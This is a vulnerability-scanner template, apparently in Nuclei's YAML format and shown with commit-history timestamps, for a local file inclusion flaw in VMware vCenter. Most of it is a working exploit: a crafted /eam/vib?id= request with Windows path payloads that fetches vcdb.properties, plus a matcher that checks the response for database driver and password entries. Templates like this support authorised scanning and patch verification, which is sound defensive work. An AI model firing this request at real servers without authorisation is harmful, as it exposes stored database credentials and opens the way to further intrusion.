2020-10-13 14:24:30 +00:00
|
|
|
id: vmware-vcenter-lfi
|
|
|
|
|
|
|
|
info:
|
2022-08-05 13:57:51 +00:00
|
|
|
name: VMware vCenter - Local File Inclusion
|
2020-10-13 14:24:30 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: high
|
2022-08-05 13:57:51 +00:00
|
|
|
description: VMware vCenter is vulnerable to local file inclusion.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-04-29 06:12:56 +00:00
|
|
|
- https://kb.vmware.com/s/article/7960893
|
|
|
|
- https://twitter.com/ptswarm/status/1316016337550938122
|
2022-08-05 13:57:51 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 3
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: vmware,lfi,vcenter
|
2020-10-13 16:02:26 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-08-22 18:09:33 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
2021-10-10 01:13:30 +00:00
|
|
|
GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
|
2021-08-22 18:09:33 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
payloads:
|
2020-10-13 14:55:29 +00:00
|
|
|
path:
|
2023-10-14 11:27:55 +00:00
|
|
|
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
|
|
|
|
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
|
|
|
|
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
|
2021-08-22 18:09:33 +00:00
|
|
|
|
2020-10-13 14:24:30 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2020-10-13 15:51:29 +00:00
|
|
|
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
|
2021-10-10 01:13:30 +00:00
|
|
|
|
2020-10-13 14:24:30 +00:00
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a0046304402205108988bc53b9f592fc09fd56aec279ff6b18c00dafdac8b6148e76186c6dd0d02202f5fe07587e04ca37f9029c4355ee5ae438f459f44dae1a6adf18c84acf5ec3c:922c64590222798bb761d5b6d8e72950
|